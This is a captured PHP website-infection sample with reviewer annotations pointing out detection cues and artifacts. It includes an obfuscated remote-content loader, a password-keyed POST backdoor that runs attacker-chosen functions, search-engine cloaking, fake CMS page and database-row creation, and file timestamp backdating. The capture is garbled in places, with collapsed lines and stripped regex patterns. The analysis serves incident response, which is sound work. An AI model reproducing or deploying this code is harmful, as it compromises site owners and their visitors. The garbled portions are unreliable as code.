match($regex, $_SERVER['REQUEST_URI'])) { $bad_url = true; break; } } /* NOTE(review): this capture starts mid-statement. The text from here to the first //iend repeats the end of the injected loader that appears in full further down between the //istart and //iend markers; only the tail of the encoded URL literal differs. Line breaks appear to have been collapsed in this capture, so each // comment now runs to the end of its physical line. */ $cookie_name = 'PHP_SESSION_PHP'; if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) { // setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/'); // $url = base64_decode('a3d3czksLDIyMy0yOzQtMjsyLTIzNCxhb2xkLDxwYm5wdm1kJXZ3blxwbHZxYGY+NDo6Nzs5NDUyNjcyOTI6MzU='); $url = decrypt_url('a3d3czksLDIyMy0yOzQtMjsyLTIzNCxhb2xkLDxwYm5wdm1kJXZ3blxwbHZxYGY+NDo6Nzs5NDUyNjcyOTI6MzU='); $code = request_url_data($url); // if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) { if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) { $echo_done = true; print $decoded; } }//iend //istart /* is_valid_url(): requires a dotted quad inside $url and rewrites $url in place with the four numeric groups in reverse order; returns false when no dotted quad is found. Presumably this keeps the contacted host from appearing in forward order even after decrypt_url() -- confirm when decoding offline. */ function is_valid_url(&$url) { if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m)) return false; $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6]; return true; } /* request_url_data(): fetches $url from the web server itself, using cURL with 5 s timeouts or, failing that, a raw fsockopen() GET on port 80, and returns the response body (or a fixed error string when neither is available). The visitor's REMOTE_ADDR, User-Agent and the requested page URL are relayed as X-Forwarded-For, User-Agent and Referer. Detection cue: outbound HTTP from the PHP process that carries visitor headers. */ function request_url_data($url) { if(!is_valid_url($url)) return false; $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"], 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"], 'Referer: ' . $site_url, )); $response = trim(curl_exec($ch)); } elseif (function_exists('fsockopen')) { $m = parse_url($url); if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) { fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . 
' HTTP/1.0' . "\r\n" . 'Host: ' . $m['host'] . "\r\n" . 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" . 'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" . 'Referer: ' . $site_url . "\r\n" . 'Connection: Close' . "\r\n\r\n"); $response = ''; while (!feof($fp)) { $response .= fgets($fp, 1024); } list($headers, $response) = explode("\r\n\r\n", $response); fclose($fp); } } else { $response = 'curl_init and fsockopen disabled'; } return $response; } /* decrypt_url(): base64-decodes its argument and XORs every byte with 3. This is obfuscation with a fixed constant, not encryption; the literal can be reversed offline without contacting the host. */ function decrypt_url($encrypted_url) { $encrypted_url = base64_decode($encrypted_url); $url = ''; for ($i = 0; $i < strlen($encrypted_url); $i++) { $url .= chr(ord($encrypted_url[$i]) ^ 3); } return $url; } /* BACKDOOR: the 32-hex string below is used as a POST field name. When that field and the POST fields 'a' and 'c' are all non-empty, the value of that field is called as a function with 'a', 'c' and '' as arguments, so the sender chooses the PHP callable and its first two arguments. Errors are hidden by error_reporting(0) and the @ operators. A GET parameter check=<same string> triggers an echo whose string is empty in this capture. Hunting: search the code base and any logged POST bodies for this string; a match means the host has been modified by a third party and needs a full integrity review, not just removal of this block. */ error_reporting(0); $_passssword = '2c6914d4f6dcceec6c2eac57db450885'; $p = $_POST; if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], ''); if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) { echo(''); } unset($_passssword); /* Cloaking gate: remote content is injected only for GET requests whose URI matches none of the patterns below (static assets, admin and login paths, feeds, ajax, cron), that carry no PHP_SESSION_PHP cookie, that have a non-empty User-Agent not matching the listed crawler names, and whose REMOTE_ADDR does not start with 74.125. A request failing any of these conditions receives the unmodified page, so a single clean response does not rule out the injection. */ $bad_url = false; if ($_SERVER['REQUEST_METHOD'] != 'GET') $bad_url = true; foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) { if (preg_match($regex, $_SERVER['REQUEST_URI'])) { $bad_url = true; break; } } $cookie_name = 'PHP_SESSION_PHP'; if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) { // setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/'); // $url = 
base64_decode('a3d3czksLDIyMy0yOzQtMjsyLTIzNCxhb2xkLDxwYm5wdm1kJXZ3blxwbHZxYGY+NDUwOjI5MjI1MDc3MjkxMzYz'); /* The remote response is requested twice (once into $code, again inside the if), strictly base64-decoded and printed into the page without escaping, so whoever controls the remote host controls the markup and script delivered on every qualifying page view. */ $url = decrypt_url('a3d3czksLDIyMy0yOzQtMjsyLTIzNCxhb2xkLDxwYm5wdm1kJXZ3blxwbHZxYGY+NDUwOjI5MjI1MDc3MjkxMzYz'); $code = request_url_data($url); // if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) { if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) { $echo_done = true; print $decoded; } }//iend /* Template capture, second stage (no authentication check is visible): any request whose URI contains the marker below makes the site fetch its own marker-rendered page (three URL variants are tried), remove tags keyed on names such as alternate, canonical, robots and viewport, rewrite google-analytics.com URLs to the local host, substitute [TITLE]/[CONTENT] placeholders and store the result in the system temp directory. NOTE(review): the leading part of most regex patterns below, and the value of $new_tags, look stripped by the capture; do not read the patterns as the author wrote them. */ if (strpos($_SERVER['REQUEST_URI'], 'saveyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $context = stream_context_create(array( 'http' => array('ignore_errors' => true), )); $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/?gimmeyourfuckingtemplate', false, $context); if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate', false, $context); } if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate/', false, $context); } if ( preg_match('/thefuckingtitle\d+/', $tpl) || preg_match('/thefuckingcontent\d+/', $tpl) || (strpos($tpl, '[TITLE]') !== false) || (strpos($tpl, '[CONTENT]') !== false) ) { $tpl = str_replace('http://[PAGE_URL]', '[PAGE_URL]', $tpl); $tpl = preg_replace('#]+?alternate[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?archives[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bookmark[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?external[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?first[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?help[^>]+?>#is', '', $tpl); $tpl = 
preg_replace('#]+?last[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?license[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?next[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?nofollow[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?noreferrer[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?pingback[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prefetch[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prev[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?search[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?sidebar[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?up[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?canonical[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?robots[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?charset[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?content-type[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?og:[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?viewport[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?keywords[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?description[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?google[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?yandex[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bing[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?slurp[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?refresh[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?referer[^>]+?>#is', '', $tpl); $tpl = preg_replace('##is', '', $tpl); $tpl = preg_replace('#http://www.google-analytics.com/#is', 'http://'.$_SERVER['HTTP_HOST'].'/', $tpl); $tpl = preg_replace('#]*>[^<]*?#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#

\[CONTENT\]

#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); /* Artifact: <system temp dir>/SESS_4f2afc9c4099ee1f39c9f551123e54bd. The two touch() calls below set the modification time of that file and of its parent directory to a random point 30 to 365 days in the past, so mtime-based triage ("files changed this week") will miss it; compare against the inode change time or a file-integrity baseline instead. */ $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (!empty($tpl) && file_put_contents($tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } /* Template capture, first stage (no authentication check is visible): a URI containing the marker below renders a placeholder page through whichever CMS is found under $root_path. Joomla branch: inserts a row with state 1 into #__content (created_by 62, dates 2011-11-11 11:11:11, alias 'fucking-alias-is-here<n>'), fetches that article over HTTP and replaces alias URLs and date strings with [PAGE_URL] and [DATE]. No deletion of the inserted row is visible here, so such rows are a database artifact to look for during incident response. */ if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = 
preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } /* WordPress branch: THEVirtualPage hooks the_posts and returns a single synthetic post (ID "-1", type 'page') carrying the marker title and content, while forcing the $wp_query flags to those of a found single page. The filters registered at the end of the branch replace the document title and the permalink with the marker title and [PAGE_URL]. No database write is visible in this branch. NOTE(review): $dategmt is assigned in the constructor without being declared on the class. */ if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . 
$this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } }